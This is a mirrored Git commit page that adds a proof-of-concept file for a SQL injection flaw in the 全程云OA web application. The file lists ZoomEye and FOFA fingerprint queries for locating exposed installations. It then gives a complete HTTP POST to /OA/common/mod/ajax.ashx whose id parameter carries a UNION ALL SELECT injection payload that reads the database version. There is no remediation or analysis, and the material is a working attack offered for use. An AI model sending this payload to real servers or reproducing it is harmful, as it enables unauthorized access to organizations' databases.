mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-17 20:34:54 +08:00
Create 全程云OA__ajax.ashxSQL注入漏洞.md
This commit is contained in:
parent
c220b37040
commit
8ef2f72f20
26
全程云OA__ajax.ashxSQL注入漏洞.md
Normal file
26
全程云OA__ajax.ashxSQL注入漏洞.md
Normal file
@ -0,0 +1,26 @@
|
|||||||
|
## 全程云OA__ajax.ashxSQL注入漏洞
|
||||||
|
|
||||||
|
## zoomeye
|
||||||
|
```
|
||||||
|
app:"全程云OA"
|
||||||
|
```
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
".passImg{background:url(images/yiyaoshi.png)"
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
POST /OA/common/mod/ajax.ashx HTTP/1.1
|
||||||
|
Host:
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
|
||||||
|
Connection: close
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
|
||||||
|
dll=DispartSell_Core.dll&class=DispartSell_Core.BaseData.DrpDataManager&method=GetProductById&id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
Loading…
x
Reference in New Issue
Block a user